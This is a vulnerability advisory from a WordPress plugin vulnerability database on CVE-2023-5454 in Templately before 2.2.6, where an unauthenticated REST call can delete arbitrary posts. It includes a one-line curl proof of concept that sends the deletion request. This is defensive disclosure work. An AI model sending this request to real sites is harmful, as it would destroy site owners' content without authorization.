WordPress Plugin Vulnerabilities

Templately < 2.2.6 - Unauthenticated Arbitrary Post Deletion

Description

The plugin does not properly authorize the `saved-templates/delete` REST API call, allowing unauthenticated users to delete arbitrary posts.

Proof of Concept

Ensure the Elementor plugin is installed so that the Elementor Template functionality is enabled.

curl -X POST https://example.com/?rest_route=/templately/v1/saved-templates/delete -d 'id=1'

Affects Plugins

Plugin icon
templately
Fixed in 2.2.6

References

CVE
CVE-2023-5454

Classification

Type
ACCESS CONTROLS
OWASP top 10
A5: Broken Access Control
CWE
CWE-284
CVSS
5.3 (medium)

Miscellaneous

Original Researcher
Krzysztof Zając (CERT PL)
Submitter
Krzysztof Zając (CERT PL)
Submitter website
https://cert.pl
Submitter twitter
cert_polska_en
Verified
Yes
WPVDB ID
1854f77f-e12a-4370-9c44-73d16d493685

Timeline

Publicly Published
2023-10-16 (about 1 months ago)
Added
2023-10-16 (about 1 months ago)
Last Updated
2023-12-05 (about 1 days ago)

Other

Published
Title
Published
2021-10-05
Title
JobSearch WP Job Board < 1.8.2 - Subscriber+ Add/Update Schedule Calls
Published
2021-10-05
Title
JobSearch WP Job Board < 1.8.2 - Subscriber+ Arbitrary Blog Options Update
Published
2021-04-17
Title
WordPress Download Manager < 3.1.18 - Unauthorised Download Duplication
Published
2021-10-29
Title
Smash Balloon Social Post Feed < 4.0.1 - Subscriber+ Arbitrary Plugin Settings Update to Stored XSS
Published
2023-06-02
Title
Page Builder by AZEXO <= 1.27.133 - Subscriber+ Post Creation